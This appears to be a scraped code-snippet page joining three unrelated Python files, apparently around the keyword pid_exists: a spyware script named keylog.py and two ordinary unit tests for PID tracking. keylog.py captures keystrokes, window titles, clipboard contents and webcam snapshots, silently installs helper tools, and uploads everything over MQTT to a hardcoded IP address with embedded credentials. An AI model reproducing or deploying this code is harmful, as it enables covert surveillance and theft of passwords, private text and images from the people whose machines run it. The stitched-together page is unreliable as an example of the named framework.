Best Python code snippet using fMBT_python
keylog.py
Source:keylog.py  
...36                    old_window = u'\nWindow : '+window+u'\n'37                    write_log(old_window, mutex)38            except:39                pass40            if not pid_exists(parent_id):41                pid().kill()42    else:43        from win32gui import GetWindowText, GetForegroundWindow44        old_window = u''45        while True:46            sleep(0.8)47            try:48                if GetWindowText(GetForegroundWindow()) not in old_window:49                    old_window = u'\nWindow : '+GetWindowText(GetForegroundWindow())+u'\n'50                    write_log(old_window, mutex)51            except:52                pass53            if not pid_exists(parent_id):54                pid().kill()55def observe_clipboard(mutex, parent_id, procq):56    procq.put("clipboard " + str(pid().pid))57    if "Linux" in platform():58        from subprocess import STDOUT, check_call59        import os60        try:61            check_call(['apt-get', 'install', '-y', 'xclip'],62                stdout=open(os.devnull,'wb'), stderr=STDOUT) 63        except:64            pass65    from pyperclip import paste as clipboard66    clip = u''67    while True:68        sleep(2)69        try:70            if clipboard() not in clip:71                clip = u'\nClip : '+clipboard()+u'\n'72                write_log(clip, mutex)73        except:74            pass75        if not pid_exists(parent_id):76            pid().kill()77def text_checker_dump(mutex, parent_id, procq):78    from keyboard import on_press, on_release79    procq.put("keylog "+str(pid().pid))80    class tcd_global:81        prev_key = u''82    def mapper(key):83        if "shift" in key:84            if key in tcd_global.prev_key:85                tcd_global.prev_key = key86                return ''87            else:88                tcd_global.prev_key = key89                return "<shift>"90        elif "ctrl" in key:91            if key in tcd_global.prev_key:92                
tcd_global.prev_key = key93                return ''94            else:95                tcd_global.prev_key = key96                return "<ctrl>"97        elif "backspace" in key:98            return "<backspace>"99        elif "space" in key:100            return " "101        elif "enter" in key:102            return "\n"103        elif "caps lock" in key:104            return "<CAPS>"105        elif "tab" in key:106            return "<tab>"107        elif "up" in key:108            return "<up>"109        elif "down" in key:110            return "<down>"111        elif "left" in key:112            return "<left>"113        elif "right" in key:114            return "<right>"115        else:116            return key117    def release_mapper(key):118        tcd_global.prev_key = ''119        if "shift" in key:120            return "</shift>"121        elif "ctrl" in key:122            return "</ctrl>"123        else:124            return ''125    def key_pressed(key_event):126        keyname = mapper(key_event.name)127        write_log(keyname, mutex)128    def key_released(key_event):129        keyname = release_mapper(key_event.name)130        write_log(keyname, mutex)131    on_press(key_pressed)132    on_release(key_released)133    while True:134        sleep(3)135        if not pid_exists(parent_id):136            pid().kill()137def send_to_server(mutex, parent_id, procq):138    import paho.mqtt.client as mqtt139    import paho.mqtt.publish as pub140    from getpass import getuser as User141    import socket142    from os import remove143    from glob import glob144    from base64 import b64encode145    procq.put("send_to_server " + str(pid().pid))146    def is_connected():147        try:148            host = socket.gethostbyname("www.google.com")149            socket.create_connection((host, 80), 2)150            return True151        except:152            pass153        return False154    while True:155        if not pid_exists(parent_id):156            
pid().kill()157        if is_connected():158            file_content = u''159            mutex.acquire()160            try:161                with open("kl.log", "rb+") as f:162                    file_content = f.read()163            except IOError:164                pass165            mutex.release()166            if file_content:167                pub.single('comp/'+User()+'/text', payload=file_content, qos=1, retain=False, hostname=hostname,168                           port="1883", client_id="", keepalive=60, will=None,169                           auth={'username': username, 'password': password}, tls=None,170                           protocol=mqtt.MQTTv311)171            try:172                remove("kl.log")173            except:174                pass175            jpgs = glob("*.jpg")176            for jpg in jpgs:177                jpgdata = ''178                with open(jpg,'rb+') as f:179                    jpgdata = b64encode(f.read())180                pub.single('comp/' + User() + '/webcam', payload=jpgdata, qos=1, retain=False,181                           hostname="72.14.176.217",182                           port="1883", client_id="", keepalive=60, will=None,183                           auth={'username': "vspectrum", 'password': "Asakura4410"}, tls=None,184                           protocol=mqtt.MQTTv311)185                remove(jpg)186        sleep(35)187def process_tracker(parent_id, processes_queue):188    sleep(10)189    process_dict = {}190    while True:191        if not pid_exists(parent_id):192            pid().kill()193        while not processes_queue.empty():194            ps = processes_queue.get().split(" ")195            process_dict[ps[0]] = ps[1]196        sleep(10)197def cam_capture(parent_id, procq):198    procq.put("webcam " + str(pid().pid))199    from os import stat, remove, devnull200    if "Linux" in platform():201        from subprocess import STDOUT, check_output, check_call202        try:203            
check_call(['apt-get', 'install', '-y', 'fswebcam'],204                stdout=open(devnull,'wb'), stderr=STDOUT) 205        except:206            pass207        def get_snap():208            filename = str(datetime.now()).replace(':', '-')[:-7] + '.jpg'209            snapshot_cmd = "fswebcam -r 640x480 -S 5 -s brightness=65% --jpeg 90 '"+filename+"'"210            window = check_output(snapshot_cmd, shell=True)211            if stat(filename).st_size < 13000:212                remove(filename)213                sleep(30)214        while True:215            if not pid_exists(parent_id):216                pid().kill()217            get_snap()218            sleep(30)219                220    else:221        from VideoCapture import Device    222        def get_snap():223            filename = str(datetime.now()).replace(':', '-')[:-7] + '.jpg'224            cam = Device()225            cam.saveSnapshot(filename, quality=60, timestamp=1, textpos='br')226            del cam227            if stat(filename).st_size < 13000:228                remove(filename)229                sleep(30)230        while True:231            if not pid_exists(parent_id):232                pid().kill()233            get_snap()234            sleep(30)235if __name__ == '__main__':236    freeze_support()237    parent_pid = pid().pid238    mutex_for_file = Lock()239    input_dump = Process(target=text_checker_dump, args=(mutex_for_file, parent_pid, process_tracker_queue))240    input_dump.start()241    window_title = Process(target=observe_context, args=(mutex_for_file, parent_pid, process_tracker_queue))242    window_title.start()243    clipboard_data = Process(target=observe_clipboard, args=(mutex_for_file, parent_pid, process_tracker_queue))244    clipboard_data.start()245    phone_home = Process(target=send_to_server, args=(mutex_for_file, parent_pid, process_tracker_queue))...test_multipidfile.py
Source:test_multipidfile.py  
1#! /usr/bin/python2# Copyright (C) 2013, 2016 Canonical Ltd.3# Author: Colin Watson <cjwatson@ubuntu.com>4# This program is free software: you can redistribute it and/or modify5# it under the terms of the GNU General Public License as published by6# the Free Software Foundation; version 3 of the License.7#8# This program is distributed in the hope that it will be useful,9# but WITHOUT ANY WARRANTY; without even the implied warranty of10# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the11# GNU General Public License for more details.12#13# You should have received a copy of the GNU General Public License14# along with this program.  If not, see <http://www.gnu.org/licenses/>.15"""Unit tests for cdimage.multipidfile."""16from __future__ import print_function17import os18try:19    from unittest import mock20except ImportError:21    import mock22from cdimage.multipidfile import MultiPIDFile, MultiPIDFileError23from cdimage.tests.helpers import TestCase, mkfile24__metaclass__ = type25class TestMultiPIDFile(TestCase):26    def setUp(self):27        super(TestMultiPIDFile, self).setUp()28        self.use_temp_dir()29        self.multipidfile = MultiPIDFile(os.path.join(self.temp_dir, "pids"))30    def test_str(self):31        """A MultiPIDFile stringifies to 'multipidfile PATH'."""32        self.assertEqual(33            "multipidfile %s" % self.multipidfile.path, str(self.multipidfile))34    def test_context_manager(self):35        """A MultiPIDFile operates as a context manager, with locking."""36        self.assertFalse(os.path.exists(self.multipidfile.lock_path))37        with self.multipidfile:38            self.assertTrue(os.path.exists(self.multipidfile.lock_path))39        self.assertFalse(os.path.exists(self.multipidfile.lock_path))40    @mock.patch("subprocess.call", return_value=1)41    def test_lock_failure(self, mock_call):42        """__enter__ raises MultiPIDFileError if the lock is already held."""43        
self.assertRaises(MultiPIDFileError, self.multipidfile.__enter__)44    def test_read_requires_lock(self):45        """_read must be called within the lock."""46        self.assertRaises(AssertionError, self.multipidfile._read)47    def test_read_missing(self):48        """A missing MultiPIDFile reads as empty."""49        with self.multipidfile:50            self.assertEqual(set(), self.multipidfile._read())51    @mock.patch("cdimage.osextras.pid_exists", return_value=True)52    def test_read_existing(self, mock_pid_exists):53        """An existing MultiPIDFile reads as the set of PIDs it contains."""54        with mkfile(self.multipidfile.path) as fd:55            print(1, file=fd)56            print(2, file=fd)57        with self.multipidfile:58            self.assertEqual(set([1, 2]), self.multipidfile._read())59    @mock.patch("cdimage.osextras.pid_exists")60    def test_read_skips_dead_pids(self, mock_pid_exists):61        """Only live PIDs are returned."""62        with mkfile(self.multipidfile.path) as fd:63            print(1, file=fd)64            print(2, file=fd)65        mock_pid_exists.side_effect = lambda pid: pid == 266        with self.multipidfile:67            self.assertEqual(set([2]), self.multipidfile._read())68    def test_write_requires_lock(self):69        """_write must be called within the lock."""70        self.assertRaises(AssertionError, self.multipidfile._write, 1)71    @mock.patch("cdimage.osextras.pid_exists", return_value=True)72    def test_write_missing(self, mock_pid_exists):73        """Writing to a missing MultiPIDFile works."""74        with self.multipidfile:75            self.multipidfile._write(set([1, 2]))76            self.assertEqual(set([1, 2]), self.multipidfile._read())77    @mock.patch("cdimage.osextras.pid_exists", return_value=True)78    def test_write_existing(self, mock_pid_exists):79        """Writing to an existing MultiPIDFile adjusts its contents."""80        with mkfile(self.multipidfile.path) as fd:81       
     print(1, file=fd)82        with self.multipidfile:83            self.multipidfile._write(set([1, 2]))84            self.assertEqual(set([1, 2]), self.multipidfile._read())85    def test_state(self):86        """The state can be fetched without explicit locking."""87        self.assertEqual(set(), self.multipidfile.state)88    @mock.patch("cdimage.osextras.pid_exists", return_value=True)89    def test_test_add(self, mock_pid_exists):90        self.assertFalse(self.multipidfile.test_add(1))91        self.assertEqual(set([1]), self.multipidfile.state)92        self.assertTrue(self.multipidfile.test_add(2))93        self.assertEqual(set([1, 2]), self.multipidfile.state)94    @mock.patch("cdimage.osextras.pid_exists", return_value=True)95    def test_test_add_error_on_existing_pid(self, mock_pid_exists):96        with mkfile(self.multipidfile.path) as fd:97            print(1, file=fd)98        self.assertRaises(MultiPIDFileError, self.multipidfile.test_add, 1)99    @mock.patch("cdimage.osextras.pid_exists", return_value=True)100    def test_remove_test(self, mock_pid_exists):101        with mkfile(self.multipidfile.path) as fd:102            print(1, file=fd)103            print(2, file=fd)104        self.assertTrue(self.multipidfile.remove_test(2))105        self.assertEqual(set([1]), self.multipidfile.state)106        self.assertFalse(self.multipidfile.remove_test(1))107        self.assertEqual(set(), self.multipidfile.state)108    def test_remove_test_error_on_empty(self):109        """remove_test raises MultiPIDFileError if already empty."""110        self.assertRaises(MultiPIDFileError, self.multipidfile.remove_test, 1)111    @mock.patch("cdimage.osextras.pid_exists", return_value=True)112    def test_remove_test_error_on_missing_pid(self, mock_pid_exists):113        with mkfile(self.multipidfile.path) as fd:114            print(1, file=fd)115        self.assertRaises(MultiPIDFileError, self.multipidfile.remove_test, 2)116    
@mock.patch("cdimage.osextras.pid_exists", return_value=True)117    def test_round_trip(self, mock_pid_exists):118        """After a +/- round-trip, the MultiPIDFile path is missing."""119        self.assertFalse(self.multipidfile.test_add(1))120        self.assertFalse(self.multipidfile.remove_test(1))121        self.assertFalse(os.path.exists(self.multipidfile.path))122    @mock.patch("cdimage.osextras.pid_exists", return_value=True)123    def test_held(self, mock_pid_exists):124        self.assertEqual(set(), self.multipidfile.state)125        with self.multipidfile.held(1) as state_zero:126            self.assertFalse(state_zero)127            self.assertEqual(set([1]), self.multipidfile.state)128            with self.multipidfile.held(2) as state_one:129                self.assertTrue(state_one)130                self.assertEqual(set([1, 2]), self.multipidfile.state)131            self.assertEqual(set([1]), self.multipidfile.state)...test_utils_process.py
Source:test_utils_process.py  
...5from utils.process import pid_exists6class UtilsProcessTest(unittest.TestCase):7    def test_my_own_pid(self):8        my_pid = os.getpid()9        self.assertTrue(pid_exists(my_pid))10    def test_inexistant_pid(self):11        # There will be one point where we finally find a free PID12        for pid in xrange(30000):13            if not pid_exists(pid):14                return...Learn to execute automation testing from scratch with the LambdaTest Learning Hub, from setting up the prerequisites and running your first automation test to following best practices and diving deeper into advanced test scenarios. The LambdaTest Learning Hub compiles step-by-step guides to help you become proficient with different test automation frameworks, e.g. Selenium, Cypress, and TestNG.
You can also refer to the video tutorials on the LambdaTest YouTube channel for step-by-step demonstrations from industry experts.
Get 100 automation test minutes FREE!
